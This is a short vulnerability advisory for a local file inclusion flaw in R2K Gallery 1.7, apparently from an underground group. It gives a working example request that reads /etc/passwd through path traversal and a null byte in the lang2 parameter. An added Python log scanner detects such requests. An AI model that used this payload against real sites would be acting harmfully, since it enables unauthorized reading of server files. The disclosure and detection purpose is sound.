R2K Gallery version 1.7 suffers from a local file inclusion vulnerability.
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ Dj7xpl@yahoo.com ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
---------------------------------------------------------------------
[!] Portal : R2K Gallery v1.7
[!] Download : http://usuarios.lycos.es/r2kscripts/
[!] Type : Local File Include Vuln
---------------------------------------------------------------------
Bug :
http://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]
Example :
http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00
---------------------------------------------------------------------
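Added example, not part of the original advisory: a Python access-log scanner that flags requests to galeria.php whose lang2 parameter carries the traversal or null-byte pattern shown above, including double-encoded variants. The log lines are constructed samples, and the allow-list of legitimate lang2 values (short language names) is an assumption about how the gallery is normally used.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: legitimate lang2 values are short language names such as "english".
SAFE_LANG = re.compile(r"^[A-Za-z0-9_-]{1,32}$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /gallery/galeria.php?pictures_folder=./example/&lang2=english HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00 HTTP/1.1" 200 1834',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /gallery/galeria.php?lang2=%252e%252e%252fconfig HTTP/1.1" 200 310',
    '192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?lang2=../x HTTP/1.1" 404 120',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_lang2(value):
    """Return the reasons a lang2 value looks like a file-inclusion attempt."""
    value = fully_decode(value)
    norm = value.replace("\\", "/").replace("\x00", "")
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")          # the %00 suffix from the advisory
    if ".." in norm.split("/"):
        reasons.append("traversal")          # ../ path segments
    if norm.startswith("/") or re.match(r"^[A-Za-z]:", norm) or "://" in norm:
        reasons.append("absolute-or-wrapper")
    if not reasons and not SAFE_LANG.match(value):
        reasons.append("not-allow-listed")
    return reasons

def scan(log_lines):
    """Yield (line_no, decoded_lang2, reasons) for suspicious galeria.php requests."""
    for no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not url.path.lower().endswith("/galeria.php"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("lang2", []):
            reasons = classify_lang2(raw)
            if reasons:
                yield no, fully_decode(raw), reasons
```

Calling `list(scan(SAMPLE_LOG))` reports lines 2 and 3 of the sample; the same `classify_lang2` check can be reused as a request filter in front of the application.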